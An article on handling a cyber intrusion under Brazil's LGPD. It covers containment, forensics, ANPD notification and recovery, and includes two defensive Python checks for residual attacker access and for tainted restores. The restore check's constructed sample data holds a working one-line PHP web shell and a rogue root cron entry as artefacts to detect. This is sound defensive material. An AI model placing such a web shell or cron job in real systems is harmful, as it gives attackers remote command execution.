A security incident in which attackers break into company systems is one of the biggest nightmares for any company today. Beyond the immediate impact on the business, there are legal and reputational consequences that can persist for months or even years. In Brazil, the General Data Protection Law (LGPD) establishes a series of requirements that companies must follow after such an incident.
According to a recent report by Federasul (Federation of Business Entities of Rio Grande do Sul), over 40% of Brazilian companies have already been targeted by some type of cyberattack. Many of them, however, still struggle to comply with the legal requirements set by the LGPD. Data from the National Data Protection Authority (ANPD) indicate that only about 30% of breached companies officially reported the incident. This gap can be attributed to several factors, including lack of awareness, the complexity of compliance processes, and fear of damage to the company's reputation.
The day after the incident: first steps
Once an intrusion has been confirmed, the first step is to contain it so that it does not spread: isolate the affected systems (preferably at the network level rather than by powering them off, so that volatile evidence and local logs survive), cut off the access path the attackers are using, and put damage-control measures in place. Containment should not get ahead of evidence preservation: a machine wiped or reimaged in a hurry takes with it the traces needed for the forensic analysis and for the report to the authorities.
At the same time, an incident response team should be assembled, including information security specialists, IT staff, lawyers, and communications advisers. This team will own the decisions of the following days, above all those involving business continuity.
For LGPD compliance, every action taken during the response must be documented, recording who did what and when. This record is the evidence that the company acted in accordance with the law, and it may be requested in audits or investigations by the ANPD.
In the first days, the response team must conduct a detailed forensic analysis to identify the origin of the breach, the method the attackers used, and the extent of the compromise. This is vital not only to understand the technical aspects of the attack but also to collect the evidence needed to report the incident to the relevant authorities and to the insurer, if the company has cyber insurance.
One aspect deserves emphasis: the forensic analysis also has to establish whether the attackers are still inside the company's network. This is, unfortunately, quite common, especially when the company is being extorted with the threat of publishing stolen data, because the criminals have every incentive to keep a foothold while the negotiation lasts. Accounts created or changed during the attack, credentials or SSH keys added to existing accounts, and logins after containment from unexpected sources are the first places to look.
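The residual-access check described above, as an added example that is not code from the original article. It runs over a constructed list of authentication events (assumed to be dicts exported from a SIEM with UTC timestamps) and reports accounts that were created, promoted or given new SSH keys during the incident window, plus any login after containment that comes from outside the allowed networks or uses one of those tainted accounts. The incident timeline, the allowed networks and every host, user, address and fingerprint are constructed sample data.

```python
"""Residual-access check over authentication events.

Added illustration, not code from the original article: it looks through
authentication events for the signs a forensic team uses to decide whether
the attackers still have a foothold after containment. The event format
(dicts exported from a SIEM, with UTC timestamps) and all hosts, users,
addresses and times are constructed sample data.
"""
import ipaddress
from datetime import datetime, timezone

# Constructed incident timeline: first sign of compromise and the moment
# network containment was applied.
INCIDENT_START = datetime(2024, 5, 10, 2, 0, tzinfo=timezone.utc)
CONTAINMENT_AT = datetime(2024, 5, 11, 9, 30, tzinfo=timezone.utc)

# Constructed: the only networks from which logins are expected (office, VPN).
ALLOWED_CIDRS = ["10.0.0.0/8", "192.168.0.0/16"]

# Constructed sample events, not real logs.
SAMPLE_EVENTS = [
    {"ts": "2024-05-10T02:14:00Z", "type": "login", "user": "svc-backup",
     "src": "203.0.113.45", "host": "fs01"},
    {"ts": "2024-05-10T02:20:00Z", "type": "user_created", "user": "support2",
     "by": "svc-backup", "host": "dc01"},
    {"ts": "2024-05-10T02:21:00Z", "type": "group_add", "user": "support2",
     "group": "Domain Admins", "host": "dc01"},
    {"ts": "2024-05-10T03:05:00Z", "type": "ssh_key_added", "user": "deploy",
     "host": "web02", "fingerprint": "SHA256:constructed-key-1"},
    {"ts": "2024-05-11T08:00:00Z", "type": "login", "user": "alice",
     "src": "10.20.30.40", "host": "web02"},
    {"ts": "2024-05-11T22:47:00Z", "type": "login", "user": "support2",
     "src": "198.51.100.7", "host": "dc01"},
    {"ts": "2024-05-12T07:10:00Z", "type": "login", "user": "bob",
     "src": "10.20.30.41", "host": "fs01"},
    {"ts": "2024-05-12T11:00:00Z", "type": "login", "user": "deploy",
     "src": "10.50.0.2", "host": "web02"},
]


def parse_ts(value: str) -> datetime:
    """Parse an ISO-8601 timestamp with a trailing Z as UTC."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def find_residual_access(events, incident_start, containment_at, allowed_cidrs):
    """Return accounts tainted during the incident and suspicious logins
    after containment.

    An account is tainted if it was created, added to a group, or had a
    credential (SSH key) added at or after incident_start. A login after
    containment_at is reported if it comes from outside the allowed
    networks or uses a tainted account; the second rule matters because a
    backdoored account used over the VPN looks legitimate by source alone.
    """
    allowed_nets = [ipaddress.ip_network(c) for c in allowed_cidrs]
    tainted = {}  # user -> list of reasons
    findings = []
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        ts = parse_ts(ev["ts"])
        kind = ev["type"]
        if ts >= incident_start and kind == "user_created":
            tainted.setdefault(ev["user"], []).append(
                f"created during the incident by {ev['by']}")
        elif ts >= incident_start and kind == "group_add":
            tainted.setdefault(ev["user"], []).append(
                f"added to {ev['group']} during the incident")
        elif ts >= incident_start and kind == "ssh_key_added":
            tainted.setdefault(ev["user"], []).append(
                f"SSH key {ev['fingerprint']} added during the incident")
        elif kind == "login" and ts >= containment_at:
            addr = ipaddress.ip_address(ev["src"])
            reasons = []
            if not any(addr in net for net in allowed_nets):
                reasons.append(f"source {ev['src']} outside allowed networks")
            reasons.extend(tainted.get(ev["user"], []))
            if reasons:
                findings.append({"ts": ev["ts"], "user": ev["user"],
                                 "host": ev["host"], "src": ev["src"],
                                 "reasons": reasons})
    return {"tainted_accounts": tainted, "post_containment_logins": findings}


def run_sample():
    """Run the check over the constructed events."""
    return find_residual_access(SAMPLE_EVENTS, INCIDENT_START,
                                CONTAINMENT_AT, ALLOWED_CIDRS)


if __name__ == "__main__":
    report = run_sample()
    for user, reasons in report["tainted_accounts"].items():
        print(f"tainted account {user}: {'; '.join(reasons)}")
    for f in report["post_containment_logins"]:
        print(f"{f['ts']} {f['user']}@{f['host']} from {f['src']}: "
              f"{'; '.join(f['reasons'])}")
```

On the sample data the check flags two post-containment logins: support2, an account the attackers created and placed in Domain Admins, logging in from an external address, and deploy, logging in from the VPN range with a key that was added during the incident. The second case is the one a source-only rule would miss, which is why tainted accounts are tracked independently of where the login comes from.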
The LGPD, in Article 48, requires the data controller to notify the ANPD and the affected data subjects of any security incident that may cause relevant risk or harm to the data subjects. The notification must be made within a reasonable period, as defined by ANPD regulation, and must include the nature of the affected personal data, the data subjects involved, the technical and security measures used to protect the data, the risks arising from the incident, and the measures that have been or will be taken to reverse or mitigate its effects.
Given this requirement, right after the initial analysis a detailed report containing all the information the LGPD requires must be prepared. Here, too, the forensic analysis is what establishes whether data was in fact exfiltrated, and how much, rather than relying on what the criminals claim to have taken.
This report must be reviewed by the compliance team and the company's lawyers before it is submitted to the ANPD. The law also requires clear and transparent communication with the affected data subjects, explaining what happened, the measures taken, and the next steps to protect their personal data.
Transparency and effective communication are fundamental during the management of a security incident. Management must keep internal and external teams informed about the progress of the response and the next steps.
Security policy assessment is a necessary action
Alongside communication with stakeholders, the company must begin reviewing its security policies and practices. This means reassessing all security controls and access rights, rotating privileged credentials (any credential the attackers could have reached should be treated as compromised), and adding measures to prevent a recurrence.
In parallel with the review of affected systems and processes, the company must recover its systems and restore operations: rebuild or clean the affected systems, apply security patches, restore from backups taken before the compromise, and revalidate access controls. Where possible, rebuild from known-good images rather than cleaning in place, and verify restored files against a trusted reference and against the indicators found in the forensic analysis, so that the backup itself does not bring the attackers' foothold back. Systems must be confirmed clean before they return to operation.
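A pre-return-to-service check of the kind described above, as an added example that is not code from the original article. It compares a restored file tree with a manifest of SHA-256 hashes recorded before the compromise (assumed to have been kept where the attackers could not alter it, for instance alongside the offline backups) and with the indicator hashes produced by the forensic analysis. The paths, file contents, manifest and indicator list are constructed sample data; snapshot_tree is included so the same check can be run on a real restored directory.

```python
"""Pre-return-to-service check of a restored system.

Added example, not code from the original article. Before a rebuilt or
restored host goes back into production it is checked against two
references: a manifest of SHA-256 file hashes recorded before the
compromise (assumed to have been kept where the attackers could not alter
it, for instance with the offline backups), and the indicator hashes
produced by the forensic analysis. Paths, file contents, the manifest and
the indicator list below are all constructed sample data.
"""
import hashlib
import os


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def snapshot_tree(root: str) -> dict:
    """Hash every file under a real directory: {relative path: sha256}."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                result[rel] = sha256_bytes(fh.read())
    return result


def validate_restore(restored: dict, manifest: dict, ioc_hashes: set) -> dict:
    """Compare a restored tree with the trusted manifest and the IOC list.

    restored and manifest map relative path -> sha256 hex digest.
    Anything modified, missing or unexpected must be explained before the
    host returns to service; an IOC hit means the backup itself carried
    the attackers' artefacts and must not be used as-is.
    """
    modified = sorted(p for p in manifest
                      if p in restored and restored[p] != manifest[p])
    missing = sorted(p for p in manifest if p not in restored)
    unexpected = sorted(p for p in restored if p not in manifest)
    ioc_hits = sorted(p for p, h in restored.items() if h in ioc_hashes)
    ok = not (modified or missing or unexpected or ioc_hits)
    return {"ok": ok, "modified": modified, "missing": missing,
            "unexpected": unexpected, "ioc_hits": ioc_hits}


# Constructed pre-incident file set, from which the trusted manifest is built.
CLEAN_FILES = {
    "etc/crontab": b"0 3 * * * root /usr/local/bin/backup.sh\n",
    "var/www/index.php": b"<?php echo 'hello'; ?>\n",
    "usr/local/bin/backup.sh": b"#!/bin/sh\ntar czf /backup/site.tgz /var/www\n",
}
TRUSTED_MANIFEST = {p: sha256_bytes(c) for p, c in CLEAN_FILES.items()}

# Constructed "restored from backup" tree: the cron job was altered, a web
# shell was added, and the backup script is missing.
RESTORED_FILES = {
    "etc/crontab": b"0 3 * * * root /usr/local/bin/backup.sh\n"
                   b"* * * * * root /tmp/.cache/x\n",
    "var/www/index.php": b"<?php echo 'hello'; ?>\n",
    "var/www/img.php": b"<?php system($_GET['c']); ?>\n",
}

# Constructed indicator list from the forensic analysis: the web shell's hash.
IOC_HASHES = {sha256_bytes(b"<?php system($_GET['c']); ?>\n")}


def run_sample() -> dict:
    """Validate the constructed restored tree against the trusted manifest."""
    restored = {p: sha256_bytes(c) for p, c in RESTORED_FILES.items()}
    return validate_restore(restored, TRUSTED_MANIFEST, IOC_HASHES)


if __name__ == "__main__":
    report = run_sample()
    print("clean for return to service" if report["ok"] else "NOT clean")
    for key in ("modified", "missing", "unexpected", "ioc_hits"):
        for path in report[key]:
            print(f"  {key}: {path}")
```

On the constructed data the restore is rejected: the crontab differs from the manifest, the backup script is missing, and img.php is both unexpected and a direct hit on the indicator list, which means the backup that was restored already contained the attackers' web shell and a clean one has to be found. A manifest that is itself restored from the compromised backup proves nothing, which is why the lead-in assumes it was stored out of the attackers' reach.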
Once the systems are operational again, a post-incident review must be conducted to identify lessons learned and areas for improvement. This review should involve all relevant parties and result in a final report that highlights the incident’s causes, actions taken, impacts, and recommendations to enhance the company’s security posture in the future.
In addition to technical and organizational actions, managing a security incident requires a proactive approach to governance and security culture. This includes implementing an ongoing cybersecurity improvement program and promoting a corporate culture that values security and privacy.
Responding to a security incident requires a set of coordinated, well-planned actions aligned with the LGPD. From initial containment and stakeholder communication to system recovery and post-incident review, each step is essential to limit the damage and ensure legal compliance. Failures must be confronted and corrected; above all, an incident should raise the company's cybersecurity strategy to a new level.